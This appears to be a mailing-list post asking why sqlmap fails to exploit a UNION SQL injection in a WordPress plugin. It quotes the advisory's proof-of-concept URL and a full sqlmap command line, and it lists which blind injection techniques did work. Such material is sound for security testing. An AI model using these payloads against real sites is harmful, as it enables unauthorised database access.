Hi,
I just read this Multiple SQL Injection in Ajax Category Dropdown wordpress
plugin<http://www.htbridge.ch/advisory/multiple_sql_injection_in_ajax_category_dropdown_wordpress_plugin.html>advisory
published by High-Tech Bridge. Among others there's a generic
UNION inject on the *category_id* GET parameter, and I decided to try it
with sqlmap.
Here's this poc provided in the advisory:
http://
[host]/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_level=2&category_id=1%20union%20select%201,user%28%29,3,4,5,6,7,8,9,version%28%29%20--%201
As you can see there's a 10 columns UNION, of which columns 2 and 10 are
rendered on the page; so when you try the above proof-of-concept on a
vulnerable target it should render a single item dropdown box in the format:
db_user (db_version)
However, I couldn't seem to be able to exploit it via sqlmap
So, being are it was a Linux box and considering WordPress runs on MySQL, I
used the following as a base for the test:
./sqlmap.py --os linux --dbms mysql --technique U --union-cols 9-11 -p
category_id --referer "http://[host]/" -u "http://
[host]/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_level=2&category_id=1"
And then I tried everything from _--level 1_ to _5_, from _--risk 1_ to _3_,
with and without _--string "Uncategorized"_ (wich applies for GET
_category_id=1_), and even _--prefix " union select " --suffix " -- 1"_; all
with no luck. In the end I removed all of the previous flags until I was
finally able to exploit an _OR boolean-based blind - WHERE or HAVING clause_
and a _MySQL > 5.0.11 OR time-based blind_ inject, only when using the
_--risk 3 --level 2_; there was also a _MySQL < 5.0.12 AND time-based blind
(heavy query)_ on _--risk 2 --level 2_, but it was too much for the server.
But still, no way to exploit the actual UNION flaw via sqlmap.
Any clue?
--
Emiliano
|
